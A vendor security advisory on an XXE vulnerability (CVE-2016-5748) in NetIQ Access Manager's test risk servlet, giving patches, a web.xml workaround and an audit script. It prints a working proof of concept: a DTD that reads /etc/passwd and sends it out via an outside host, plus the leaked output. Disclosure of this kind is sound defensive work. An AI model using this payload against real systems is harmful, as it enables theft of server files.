Access Manager XXE vulnerability with test risk servlet (CVE-2016-5748)

  • 7017797
  • 01-Jul-2016
  • 29-Aug-2016

Environment

NetIQ Access Manager 4.2
NetIQ Access Manager 4.1
Access Manager Identity Server
CVE-2016-5748

Situation

Access Manager 4.1 and 4.2 support risk-based authentication on the Identity Server. This feature ships with a test risk servlet (/nidp/test/risk) that lets administrators and users verify what their risk scores are. It is possible to modify the accompanying JSP page to trigger an XML External Entity (XXE) processing vulnerability (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).

To do this, one needs write access to /opt/novell/nids/lib/webapp/jsp/risk.jsp in order to change the default DTD reference (loose.dtd) so that it points to another DTD file that does more damage, e.g. a remotely accessible DTD with which an attacker can carry out an XXE attack that in turn reads the file system and any file readable by the IDP.

a) create sample DTD (test.dtd) on a web server for file access on the attacked system:

pentest@nam:~/neil$ cat test.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://10.1.1.1/bla#%p1;'>">%p2;

b) modify the risk.jsp to point to the test.dtd file created on the web server in a) above:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://10.1.1.1/test.dtd" > <foo>&e1;</foo>

c) Access the risk servlet at https://login.netiq.com/nidp/test/risk, where login.netiq.com is the IDP server domain name, and confirm that the contents of /etc/passwd appear in the browser:

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Client</faultcode><faultstring>http://10.1.1.1/bla#root:x:0:0:root:/root:/bin/bash
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false

Resolution

Apply 4.2.2 for NAM 4.2; or 4.1.2 Hot Fix 1 for NAM 4.1.

As a workaround, one can also disable the risk.jsp in the web.xml file at /opt/novell/nids/lib/webapp/WEB-INF/web.xml. Simply delete the following servlet definition, together with its matching servlet-mapping block, and restart the IDP server with 'rcnovell-idp restart':

        <!--  To disable the risk module test tool  block below servlet and servlet-mapping tags -->
        <servlet>
                <servlet-name>riskjsp</servlet-name>
                <display-name>test risk group</display-name>
                <jsp-file>
                        /jsp/risk.jsp
                </jsp-file>
        </servlet>
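To confirm the workaround actually took effect (both the servlet definition and its mapping gone from web.xml), the following audit script is an added example, not part of this advisory or the product. The sample web.xml is constructed from the excerpt above; its xmlns and the /test/risk servlet-mapping are assumptions.

```python
import xml.etree.ElementTree as ET

RISK_JSP = "/jsp/risk.jsp"
# Constructed sample modelled on the advisory's web.xml excerpt; the xmlns and the
# /test/risk servlet-mapping are assumptions, not copied from the product.
VULNERABLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <servlet>
    <servlet-name>riskjsp</servlet-name>
    <display-name>test risk group</display-name>
    <jsp-file>
      /jsp/risk.jsp
    </jsp-file>
  </servlet>
  <servlet-mapping>
    <servlet-name>riskjsp</servlet-name>
    <url-pattern>/test/risk</url-pattern>
  </servlet-mapping>
</web-app>
"""

def _local(tag):
    """Strip the namespace so tags match with or without a default xmlns."""
    return tag.rsplit("}", 1)[-1]

def _child_text(elem, name):
    """Text of the first direct child called `name`, whitespace-stripped."""
    for child in elem:
        if _local(child.tag) == name and child.text is not None:
            return child.text.strip()
    return None

def risk_servlet_exposure(web_xml):
    """Map each servlet still serving risk.jsp to the url-patterns it is mounted on."""
    root = ET.fromstring(web_xml)
    exposure = {}
    for el in root:  # servlet and servlet-mapping are direct children of web-app
        if _local(el.tag) == "servlet" and _child_text(el, "jsp-file") == RISK_JSP:
            exposure.setdefault(_child_text(el, "servlet-name"), [])
    for el in root:
        if _local(el.tag) == "servlet-mapping":
            name = _child_text(el, "servlet-name")
            if name in exposure:
                exposure[name].append(_child_text(el, "url-pattern"))
    return exposure

def workaround_applied(web_xml):
    """True only when no servlet definition for risk.jsp remains (removing the mapping alone is not enough)."""
    return not risk_servlet_exposure(web_xml)
```

Run it against the live file with `risk_servlet_exposure(open("/opt/novell/nids/lib/webapp/WEB-INF/web.xml").read())`; an empty result means the servlet is no longer defined.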